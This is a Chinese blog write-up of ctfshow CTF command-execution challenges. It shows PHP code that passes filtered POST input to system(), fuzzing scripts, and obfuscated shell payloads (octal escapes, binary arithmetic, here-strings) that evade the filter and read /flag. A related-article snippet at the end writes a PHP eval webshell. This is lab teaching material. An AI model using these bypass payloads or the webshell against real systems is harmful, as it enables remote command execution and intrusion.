ctfshow 每周大挑战 极限命令运行

最新推荐文章于 2024-04-29 09:28:09 发布
最新推荐文章于 2024-04-29 09:28:09 发布
阅读量537 收藏 2
点赞数 4
分类专栏: 公开赛 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/138130455
版权

题目1

 <?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势,太棒啦~。
//flag在根目录flag里,或者直接运行根目录getflag

error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (!preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/",$ctfshow)){
            system($ctfshow);
        }else{
            echo("????????");
        }
}
?>

脚本跑一下

<?php
for ($i=32;$i<127;$i++){
        if (!preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/",chr($i))){
            echo chr($i)." ";
        }
}

还有这些可以用

! $ ’ ( ) , . / 0 1 2 3 4 5 6 7 8 9 = ? \ a ~

直接运行getflag用通配符

POST:
ctf_show=/?????a?

题目2

 <?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势,太棒啦~。
//flag在根目录flag里,或者直接运行根目录getflag

error_reporting(0);
highlight_file(__FILE__);
include "check.php";

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    check($ctfshow);
    system($ctfshow);
}
?> 

import requests
 
#这里填写自己的靶机网址
url = "http://40e404d6-3af3-401c-b11c-9e48298fd1ce.challenge.ctf.show/"
 
str= ""
for i in range(255):
    data = {'ctf_show':chr(i)}
    retext = requests.post(url,data=data).text
    if "??????" in retext:
        print(1)
    else:
        str += chr(i)
 
print(str)

!#$&'()0123456789<_{}~

没有通配符了,但是可以通过$'\xxx'的方式执行命令,其中xxx是ascii字母的8进制值

ls=$'\154\163'
/getflag=$'\57\147\145\164\146\154\141\147'

POST:
ctf_show=$'\57\147\145\164\146\154\141\147'

题目3

!#$&'()01<_{}~
跑完脚本发现这些可以用

我们的目的是构造命令cat /flag
然后进行合理的手段只有01不难想到是二进制,然后我们再转换为刚才的八进制来执行命令

在这里插入图片描述

$((1<<1))=2
ls=$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'
这里能正常解析但是无法执行,我们要使用<<<来进行命令执行
三个小于号 (<<<) 是一种特殊的重定向操作符,被称为here-string。它允许你直接将一个字符串作为命令的标准输入。

ctf_show=$0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'
$0是用来接受命令的

cat /flag=$\'\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))\'
POST:
ctf_show=$0<<<$0\<\<\<\$\'\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))\'

题目4

!#$&'()0<_{}~

先用脚本跑出这些东东能用
然后要找出1就能有答案了

$#=0
${##}=1
abc=aaaa
${#abc}=4(字符长度)

在这里插入图片描述在这里插入图片描述
现在直接用${##}替换1

ctf_show=$0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}000${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}0${##}00${##}00))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}0))\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}${##}))\'

题目5

跑脚本的东西

!$&'()<=_{}~

${!xxx}的知识点
def=456
${!def}=456

然后这里我们发现可以取反获得数字0 1

~a=-(a+1)
$(())=0
$((~$(())))=-1
$((~$(())))$((~$(())))=-1-1
$(($((~$(())))$((~$(())))))=-2
$((~$(($((~$(())))$((~$(())))))))=1
得到一个规律就是-1取反得到0-2取反得到1,以此类推

$((~$(($((~$(())))$((~$(())))$((~$(())))))))=2
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))=3
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))=4
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))=5
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))=6
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))=7

在这里插入图片描述

首先由于bash的局限性:变量命名规范是以下划线或者英文字母开头,我们命令__=$(())
然后再利用${!__}=0来代替中间命令用&&来分割,但是&&被过滤我们使用URL%26%26替代

我们都可以直接执行8进制的了

cat /flag=$'\143\141\164\40\146\154\141\147'
ctf_show=__=$(())%26%26${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'
baozongwi
关注
专栏目录
[ctfshow]web入门——命令执行web118-web122+web124)
ShenZ的博客
02-28 3798
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
命令执行漏洞—CTFSHOW(简单利用)
weixin_44431280的博客
03-05 1419
命令执行漏洞—CTFSHOW(简单利用) 远程命令执行简介和原理可以参考文章Web安全—远程命令/代码执行(RCE) 远程命令执行1: 1,题目简介分析 代码分析:$_GET()函数读取URL传过来的C参数和值,然后使用preg_match函数判断传过来的参数值是否包含flag值(用来对传入的参数值进行过滤),然后使用eval()函数执行C参数传过来的值。 2,思路分析 通过信息收集判断网站操作系统类型,然后通过参数传入值执行操作系统命令,因为未对参数值进行限制,所以此处存在命令执行和代码执行漏洞 通过
ctfshow 每周挑战 RCE极限挑战4、5
Altering_Ji的博客
05-31 1646
ctfshow RCE极限挑战4和5 看过官方wp之后复现的,payload是自己后来写的,可能不如官方的看着清晰,但又很能碎碎念
CTFShow--周末大挑战parse_url篇Writeup
Aluxian_的博客
05-15 831
【代码】CTFShow--周末大挑战Writeup。
ctfshow每周挑战之RCE极限挑战
最新发布
heike_Ch的博客
04-29 664
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
ctfshow 每周挑战 极限命令执行
m0_64815693的博客
02-12 3995
ctfshow 每周挑战 极限命令执行 wp
CTFshow-命令执行(1)
qq_61376069的博客
12-30 392
CTFshow入门——命令执行29-40 用分号、字母、小括号从变量入手;eval逃逸参数
CTFShow-周末大挑战parse-url篇Writeup
05-19
第一关的挑战是一个基础的命令注入(Command Injection)问题。URL中的`http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt')`被解析并执行,它试图改变目录到根目录,并读取`flag_is_here.txt`文件。这表明...
ctfshow RCE极限挑战
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow web入门之命令执行总结
小白的博客
05-10 490
1、命令执行函数。
ctfshow命令执行
nidaxin的博客
02-11 2437
网页的 URL 只能包含两类合法的字符: URL 元字符:分号(;),逗号(,),斜杠(/),问号(?),冒号(:),at(@),&,等号(=),加号(+),美元符号($),井号(#) 语义字符:a-z,A-Z,0-9,连词号(-),下划线(_),点(.),感叹号(!),波浪线(~),星号(*),单引号('),圆括号(()) 除了以上字符,其他字符出现在 URL 之中都必须转义,规则是根据操作系统的默认编码,将每个字节转为百分号(%)加上两个大写的十六进制字母。 web...
CTFSHOW 命令执行
asmartrman的博客
09-27 2282
ctfshow-web入门-命令执行板块(持续更新)
CTFSHOW WEB 1-100
weixin_54558860的博客
11-20 4744
ctfshow web 1-100
命令执行命令执行01
zh的博客
10-14 178
靶场地址:http://whalwl.xyz:8033/ 解题准备:BP抓包,了解linux基本解压命令 解题思路: 1、BP抓包,替换POST中name的值 backup.tar.gz;echo '<?php @eval($_POST["x"]); ?>' >shell.php 2、成功上传 3、使用蚁剑连接http://whalwl.xyz:8033/shell.php 密码为 x ...
CTF长度限制命令执行
Je3Z的博客
03-27 1776
7长度限制 理解一下叭。比如这个命令: echo Y2F0IC9mbGFn|base64 -d>feng 1 现在有了长度限制,能怎么办呢?思路就是把要执行命令一点一点的写在文件名上,然后利用ls -t,按照时间对于文件进行排序,ls -t>0,就可以把文件名按照时间顺序排序写进0文件中。p师傅这里用的是w命令然后写进文件,但事实上,前面的w也可以省略: 文件内容可控又怎么样呢?还需要知道3个东西。 linux中可以用\使指令连接下一行,这样就可以写多行命令了。 文件中前面命令出错,会自动跳过
ctfshow命令执行(持续更新,已更至web39)
qq_55233040的博客
08-17 835
命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧。 web29web30web31 web29 题目如下: error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 先GET一个参数c,如果c中没有’flag’字
ctfshow---命令执行
fainpo的博客
03-20 1446
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
ctfshow 命令执行
m0_74097148的博客
05-21 4016
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
CTFShow周末大挑战:解析url获取flag Writeup
在本篇CTFShow的周末大挑战中,我们将深入解析六个关于URL编码和解析的网络安全题目,涉及GET和POST请求以及基础的漏洞利用技巧。每个关卡都旨在测试参赛者的编码理解、Web应用程序安全和基本的编码解码能力。 1. *...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值